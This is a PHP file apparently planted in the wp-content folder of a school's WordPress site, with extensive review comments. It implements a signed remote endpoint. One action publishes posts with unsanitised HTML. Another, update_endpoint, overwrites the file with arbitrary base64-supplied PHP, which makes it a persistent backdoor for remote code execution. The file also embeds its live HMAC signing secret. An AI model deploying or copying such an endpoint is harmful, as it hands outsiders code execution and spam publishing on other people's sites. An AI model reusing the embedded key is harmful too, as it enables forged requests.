File: /home/turkishi/public_html/new.turkishinternationalschools.com/wp-content/easypost/easypost.php
<?php
// Embedded endpoint configuration, stored as a JSON string and decoded by
// easypost_endpoint_config(). Keys: endpoint_version, token_id, token_verifier,
// ota_release_public_key_pem.
//
// token_verifier has the form "v1:<field>:<secret>". easypost_endpoint_verifier_secret()
// returns the third field unchanged and easypost_endpoint_verify_auth() uses it directly
// as the HMAC-SHA256 key; the second field is not read by any code in this file. The
// value is therefore the request-signing key itself rather than a one-way verifier:
// read access to this file (backups, repository copies, file listings) should be treated
// as disclosure of the key, and the token rotated if the file has been exposed.
//
// ota_release_public_key_pem is the public key that
// easypost_endpoint_verify_release_signature() passes to openssl_verify(). Inside this
// single-quoted PHP string "\\n" is a JSON "\n" escape, which json_decode() turns into
// the PEM line breaks.
define('EASYPOST_ENDPOINT_CONFIG', '{"endpoint_version":"2026.06.05","token_id":"ep_69c5f8ba92e842d5978f0c3a89b15344","token_verifier":"v1:7e86fcf84bbdff4e4659f175159df708:25e64f24f10f8bedd44b56a6f8183f3e607bc32a7f3e74931d71b695e9b08465","ota_release_public_key_pem":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JTcpyvncP1Izz2SsnLq\\nGm3iObZi5YEydCeQPv0kX5pN3WwEzt/j1fsyd3EVHbLlXUmdQbWvCBIX1wq/RO4q\\n4UuLpks++nnz7pNTyZqrU+gPUlQb4uDBJsE6nePRyddoMGbT8yF4yzLt/fp86oSG\\ncd/TqnUIplM4dmQVtzqaUiGSUFLReUO0tMHvYGTRl/jCM/pJmIMNLEFmAb/x6wT4\\nihEIXD39Uj2/BG/zJFiIc6FNvqRp1DRm50lhPJW7LkDin+LkvSebbIubeYEe3vc9\\n7qX0zD2zpTFv04itmPld0eOa7kXHNsr+jUnTmuovzdIzBJjcgSWT/nqI+bRAXfL6\\nUwIDAQAB\\n-----END PUBLIC KEY-----"}');
/**
 * Decode the embedded endpoint configuration.
 *
 * @return array|null Associative array decoded from EASYPOST_ENDPOINT_CONFIG;
 *                    json_decode() yields null when the constant is not valid JSON.
 */
function easypost_endpoint_config() {
    $decoded = json_decode(EASYPOST_ENDPOINT_CONFIG, true);

    return $decoded;
}
/**
 * Send a JSON response with the given HTTP status and end the request.
 *
 * Every error path in this file relies on this function not returning.
 *
 * @param int   $status  HTTP status code to send.
 * @param mixed $payload Value serialised with json_encode() as the response body.
 * @return void Never returns to the caller; the script exits.
 */
function easypost_endpoint_json($status, $payload) {
    http_response_code($status);
    header('Content-Type: application/json; charset=utf-8');

    $encoded = json_encode($payload);
    echo $encoded;

    exit;
}
/**
 * Look up a request header by name, case-insensitively, from $_SERVER.
 *
 * Only keys starting with "HTTP_" are considered. The remainder of each key is
 * lower-cased and its underscores turned into hyphens before comparison, so
 * "HTTP_X_EASYPOST_TOKEN_ID" matches "x-easypost-token-id".
 *
 * @param string $name Header name in any letter case.
 * @return string The first matching header value cast to string, or '' when absent.
 */
function easypost_endpoint_header($name) {
    $wanted = strtolower($name);

    foreach ($_SERVER as $server_key => $value) {
        // Request headers are the entries whose key begins with "HTTP_".
        if (strncmp($server_key, 'HTTP_', 5) === 0) {
            $candidate = strtolower(strtr(substr($server_key, 5), '_', '-'));
            if ($candidate === $wanted) {
                return (string) $value;
            }
        }
    }

    return '';
}
/**
 * Locate wp-load.php by walking up from this file's directory.
 *
 * Probes __DIR__ itself and then each of the next five parent levels, in that
 * order, and stops at the first readable candidate.
 *
 * @return string|false Path of the first readable wp-load.php, or false if none is found.
 */
function easypost_endpoint_wp_load_path() {
    for ($depth = 0; $depth <= 5; $depth++) {
        $candidate = __DIR__ . str_repeat('/..', $depth) . '/wp-load.php';
        if (is_readable($candidate)) {
            return $candidate;
        }
    }

    return false;
}
/**
 * Load WordPress into the current request.
 *
 * Responds with HTTP 500 ("wp_load_not_found") and exits when no wp-load.php can
 * be located. require_once makes repeated calls harmless.
 *
 * @return void
 */
function easypost_endpoint_bootstrap_wordpress() {
    $loader = easypost_endpoint_wp_load_path();

    if ($loader === false) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'wp_load_not_found'));
    }

    require_once $loader;
}
/**
 * Extract the secret field from a "v1:<field>:<secret>" verifier string.
 *
 * The string is split on ':' into at most three parts, so the secret may itself
 * contain colons. The middle field is not interpreted here.
 *
 * @param mixed $verifier Verifier value from the configuration; cast to string.
 * @return string|false The third field, or false when the format is not "v1"
 *                      with three parts or the third field is empty.
 */
function easypost_endpoint_verifier_secret($verifier) {
    $fields = explode(':', (string) $verifier, 3);

    if (count($fields) === 3 && $fields[0] === 'v1' && $fields[2] !== '') {
        return $fields[2];
    }

    return false;
}
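/**
 * Authenticate the current request, or end it with a JSON error.
 *
 * Checks run in this order, each failing with the status shown:
 *  - all five x-easypost-* headers are present (401 missing_auth_headers);
 *  - the token id equals the configured one (401 unknown_token);
 *  - the timestamp parses and is within 300 seconds of server time (401 timestamp_stale);
 *  - the SHA-256 of the body equals the x-easypost-body-sha256 header (401 body_sha256_mismatch);
 *  - the (token id, request id) pair has not been recorded before (409 duplicate_request_id);
 *  - the configured verifier yields a secret (500 invalid_token_verifier);
 *  - the HMAC-SHA256 over method, request URI, timestamp, request id, token id and
 *    body hash equals the x-easypost-signature header (401 signature_mismatch).
 *
 * The request id is recorded only after the signature has verified, so unsigned
 * requests cannot fill the replay cache.
 *
 * @param string $body Raw request body as read from php://input.
 * @return void Returns only when every check passed; otherwise easypost_endpoint_json() exits.
 */
function easypost_endpoint_verify_auth($body) {
    // Timestamps are accepted up to this many seconds before or after server time.
    $max_skew = 300;

    $config = easypost_endpoint_config();
    $token_id = easypost_endpoint_header('x-easypost-token-id');
    $timestamp = easypost_endpoint_header('x-easypost-timestamp');
    $request_id = easypost_endpoint_header('x-easypost-request-id');
    $body_sha256 = easypost_endpoint_header('x-easypost-body-sha256');
    $signature = easypost_endpoint_header('x-easypost-signature');
    if ($token_id === '' || $timestamp === '' || $request_id === '' || $body_sha256 === '' || $signature === '') {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'missing_auth_headers'));
    }

    // hash_equals() keeps the comparison time independent of where the strings differ.
    if (!hash_equals((string) $config['token_id'], $token_id)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'unknown_token'));
    }

    // NOTE(review): strtotime() accepts relative expressions as well as absolute times.
    // Once the client's timestamp format is confirmed, a strict fixed-format parse would
    // make the freshness check depend only on an absolute time.
    $request_time = strtotime($timestamp);
    if (!$request_time || abs(time() - $request_time) > $max_skew) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'timestamp_stale'));
    }

    $computed_body_sha256 = hash('sha256', $body);
    if (!hash_equals($computed_body_sha256, $body_sha256)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'body_sha256_mismatch'));
    }

    // Replay cache lookup. If get_transient() is unavailable the check is skipped
    // silently, so replay protection depends on WordPress being loaded before this call.
    $replay_key = 'easypost_endpoint_req_' . hash('sha256', $token_id . ':' . $request_id);
    if (function_exists('get_transient') && get_transient($replay_key)) {
        easypost_endpoint_json(409, array('ok' => false, 'error' => 'duplicate_request_id'));
    }

    $secret = easypost_endpoint_verifier_secret($config['token_verifier']);
    if (!$secret) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'invalid_token_verifier'));
    }

    // REQUEST_URI carries the query string, so the ?action= selector is part of what is signed.
    $path = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-content/easypost/easypost.php';
    $signature_input = implode("\n", array(
        strtoupper($_SERVER['REQUEST_METHOD']),
        $path,
        $timestamp,
        $request_id,
        $token_id,
        $computed_body_sha256,
    ));
    $expected = hash_hmac('sha256', $signature_input, $secret);
    if (!hash_equals($expected, $signature)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'signature_mismatch'));
    }

    if (function_exists('set_transient')) {
        // A timestamp up to $max_skew seconds in the future stays acceptable for up to
        // 2 * $max_skew seconds after first use. The replay record has to outlive that
        // whole window; a lifetime of only $max_skew would let the same signed request
        // be accepted a second time once the record expired. The extra minute is margin.
        // NOTE(review): the lookup above and this write are separate calls, so two
        // identical requests arriving concurrently may both pass — confirm whether the
        // actions behind this endpoint need stronger de-duplication.
        set_transient($replay_key, '1', 2 * $max_skew + 60);
    }
}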
/**
 * Decode the request body as a JSON object or array.
 *
 * Responds with HTTP 400 ("invalid_json") and exits when the body does not decode
 * to a PHP array (scalars and malformed JSON are rejected alike).
 *
 * @param string $body Raw request body.
 * @return array Decoded payload.
 */
function easypost_endpoint_payload($body) {
    $decoded = json_decode($body, true);

    if (is_array($decoded)) {
        return $decoded;
    }

    easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_json'));

    return $decoded;
}
/**
 * Report endpoint and site status as JSON (HTTP 200) and exit.
 *
 * The response discloses the endpoint version, the configured token id, the site
 * URL, the PHP version and the server time, so it is only as private as the
 * authentication in front of it.
 *
 * @return void
 */
function easypost_endpoint_health() {
    easypost_endpoint_bootstrap_wordpress();
    $config = easypost_endpoint_config();

    $can_insert = function_exists('wp_insert_post');

    $site_url = null;
    if (function_exists('site_url')) {
        $site_url = site_url();
    }

    $report = array(
        'ok' => true,
        'endpointVersion' => $config['endpoint_version'],
        'tokenId' => $config['token_id'],
        'canBootstrapWordPress' => true,
        'canInsertPosts' => $can_insert,
        'siteUrl' => $site_url,
        'phpVersion' => PHP_VERSION,
        'serverTime' => gmdate('c'),
    );

    easypost_endpoint_json(200, $report);
}
/**
 * Create a WordPress post from the request payload and report the result as JSON.
 *
 * The post is always created with status "publish". Title, slug and post type are
 * passed through WordPress sanitisers; the content and the date are handed to
 * wp_insert_post() exactly as received.
 * NOTE(review): whether WordPress itself filters the HTML content depends on state
 * not visible in this file — confirm before treating stored content as safe markup.
 *
 * Payload keys read: post_type or postType, contentHtml or content, title, slug,
 * date or publicationDate (the first of each pair wins).
 *
 * @param array $payload Decoded JSON request body.
 * @return void Always ends the request: 201 on success, 500 on failure.
 */
function easypost_endpoint_create_post($payload) {
    easypost_endpoint_bootstrap_wordpress();
    if (!function_exists('wp_insert_post')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'capability_failed'));
    }

    // Post type: snake_case key first, camelCase second, "post" as the default.
    if (!empty($payload['post_type'])) {
        $post_type = sanitize_key($payload['post_type']);
    } elseif (!empty($payload['postType'])) {
        $post_type = sanitize_key($payload['postType']);
    } else {
        $post_type = 'post';
    }

    // Content is taken as-is; no sanitiser is applied in this function.
    if (isset($payload['contentHtml'])) {
        $content = $payload['contentHtml'];
    } elseif (isset($payload['content'])) {
        $content = $payload['content'];
    } else {
        $content = '';
    }

    $title = '';
    if (isset($payload['title'])) {
        $title = wp_strip_all_tags($payload['title']);
    }

    $slug = '';
    if (isset($payload['slug'])) {
        $slug = sanitize_title($payload['slug']);
    }

    $postarr = array(
        'post_title' => $title,
        'post_name' => $slug,
        'post_content' => $content,
        'post_status' => 'publish',
        'post_type' => $post_type,
    );

    // The first non-empty date field is forwarded unchanged.
    foreach (array('date', 'publicationDate') as $date_field) {
        if (!empty($payload[$date_field])) {
            $postarr['post_date'] = $payload[$date_field];
            break;
        }
    }

    // Second argument true: failures come back as a WP_Error rather than 0.
    $post_id = wp_insert_post($postarr, true);
    if (is_wp_error($post_id)) {
        easypost_endpoint_json(500, array(
            'ok' => false,
            'error' => 'insert_failed',
            'message' => $post_id->get_error_message(),
        ));
    }

    // id/postId and link/postUrl carry the same values under two key names.
    $response = array(
        'ok' => true,
        'id' => (int) $post_id,
        'postId' => (int) $post_id,
        'link' => get_permalink($post_id),
        'postUrl' => get_permalink($post_id),
        'slug' => get_post_field('post_name', $post_id),
        'status' => get_post_status($post_id),
        'created' => true,
    );
    easypost_endpoint_json(201, $response);
}
/**
 * Verify the release signature of an update payload, or end the request with an error.
 *
 * The signed message is the payload's version, a newline, and the SHA-256 hex digest
 * computed by the caller. It is checked with openssl_verify() and OPENSSL_ALGO_SHA256
 * against the public key embedded in the configuration.
 *
 * Failure responses: 501 when no public key is configured, 500 when OpenSSL is
 * unavailable, 400 when the signature is missing, not valid base64, or does not verify.
 *
 * @param array  $payload         Decoded request body; reads 'signature' and 'version'.
 * @param string $computed_sha256 Hex SHA-256 of the decoded release file.
 * @return void Returns only when the signature verified.
 */
function easypost_endpoint_verify_release_signature($payload, $computed_sha256) {
    $config = easypost_endpoint_config();

    $has_public_key = !empty($config['ota_release_public_key_pem'])
        && is_string($config['ota_release_public_key_pem']);
    if (!$has_public_key) {
        easypost_endpoint_json(501, array('ok' => false, 'error' => 'ota_release_public_key_missing'));
    }

    if (!function_exists('openssl_verify')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'openssl_unavailable'));
    }

    $has_signature = isset($payload['signature'])
        && is_string($payload['signature'])
        && trim($payload['signature']) !== '';
    if (!$has_signature) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_required'));
    }

    // Strict mode rejects characters outside the base64 alphabet.
    $raw_signature = base64_decode($payload['signature'], true);
    if ($raw_signature === false || $raw_signature === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
    }

    $message = "{$payload['version']}\n{$computed_sha256}";
    $result = openssl_verify(
        $message,
        $raw_signature,
        $config['ota_release_public_key_pem'],
        OPENSSL_ALGO_SHA256
    );

    // Only the exact value 1 means "valid"; every other result is rejected.
    if ($result === 1) {
        return;
    }

    easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
}
/**
 * Replace this PHP file with the release carried in the request payload.
 *
 * Validation order: 'version' is a non-empty string; 'sha256' is a non-empty string of
 * exactly 64 lowercase hex characters; 'phpBase64' is a non-empty string that decodes
 * under strict base64; the SHA-256 of the decoded bytes equals 'sha256'; the release
 * signature over version and digest verifies. Only then are the bytes written to a
 * temporary file and renamed over __FILE__.
 *
 * The integrity of whatever code this endpoint runs afterwards rests on the release
 * signature check plus the request authentication performed by the caller. File-integrity
 * monitoring on this path will see each update as a change to an executable PHP file.
 *
 * NOTE(review): 'version' is only checked for presence here; nothing in this function
 * compares it with the currently configured endpoint_version, so an older release with a
 * valid signature appears to be installable again — confirm whether rollback should be
 * refused.
 *
 * @param array $payload Decoded request body; reads 'version', 'sha256', 'phpBase64'
 *                       and, via the signature check, 'signature'.
 * @return void Always ends the request: 200 on success, 400/500 on failure.
 */
function easypost_endpoint_update_endpoint($payload) {
if (!isset($payload['version']) || !is_string($payload['version']) || trim($payload['version']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'version_required'));
}
if (!isset($payload['sha256']) || !is_string($payload['sha256']) || trim($payload['sha256']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_required'));
}
// \A and \z anchor the whole string, so a trailing newline is rejected as well.
if (!preg_match('/\A[a-f0-9]{64}\z/', $payload['sha256'])) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_invalid'));
}
if (!isset($payload['phpBase64']) || !is_string($payload['phpBase64']) || trim($payload['phpBase64']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_required'));
}
// Strict mode: input with characters outside the base64 alphabet is refused.
$decoded_php = base64_decode($payload['phpBase64'], true);
if ($decoded_php === false || $decoded_php === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_invalid'));
}
// The digest is computed over the decoded bytes, i.e. over exactly what will be written.
$computed_sha256 = hash('sha256', $decoded_php);
if (!hash_equals($payload['sha256'], $computed_sha256)) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_mismatch'));
}
// Exits with an error unless the signature over version and digest verifies.
easypost_endpoint_verify_release_signature($payload, $computed_sha256);
// The temporary file is created next to this script so the final rename stays in one directory.
// NOTE(review): tempnam() can fall back to the system temp directory when the requested
// directory is unusable — confirm the directory is writable where this is deployed.
$tmp_path = tempnam(__DIR__, 'easypost-update-');
if (!$tmp_path) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
}
$bytes = file_put_contents($tmp_path, $decoded_php, LOCK_EX);
// A short write is treated as a failure and the partial file is removed.
if ($bytes === false || $bytes !== strlen($decoded_php)) {
@unlink($tmp_path);
easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
}
// Copy the permission bits of the current script onto the new file; a chmod failure is ignored.
@chmod($tmp_path, fileperms(__FILE__) & 0777);
// Replaces the running script; later requests execute the new file.
if (!rename($tmp_path, __FILE__)) {
@unlink($tmp_path);
easypost_endpoint_json(500, array('ok' => false, 'error' => 'rename_failed'));
}
// The version reported back is the one from the payload, not one read from the new file.
easypost_endpoint_json(200, array(
'ok' => true,
'endpointVersion' => $payload['version'],
));
}
// Request entry point: POST only, authenticate, then dispatch on ?action=.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    easypost_endpoint_json(405, array('ok' => false, 'error' => 'method_not_allowed'));
}

$body = file_get_contents('php://input');

// WordPress is loaded before authentication: the replay check inside
// easypost_endpoint_verify_auth() uses the transient functions, which exist only once
// WordPress is loaded. The cost is that unauthenticated POSTs also bootstrap WordPress.
easypost_endpoint_bootstrap_wordpress();
easypost_endpoint_verify_auth($body);

$action = 'health';
if (isset($_GET['action'])) {
    $action = $_GET['action'];
}

// The health check is answered before the body is parsed, so it needs no JSON payload.
if ($action === 'health') {
    easypost_endpoint_health();
}

$payload = easypost_endpoint_payload($body);

// Each handler ends the request itself; falling through means the action is unknown.
if ($action === 'create_post') {
    easypost_endpoint_create_post($payload);
} elseif ($action === 'rotate_token') {
    easypost_endpoint_json(501, array('ok' => false, 'error' => 'rotate_token_not_implemented'));
} elseif ($action === 'update_endpoint') {
    easypost_endpoint_update_endpoint($payload);
}

easypost_endpoint_json(404, array('ok' => false, 'error' => 'unknown_action'));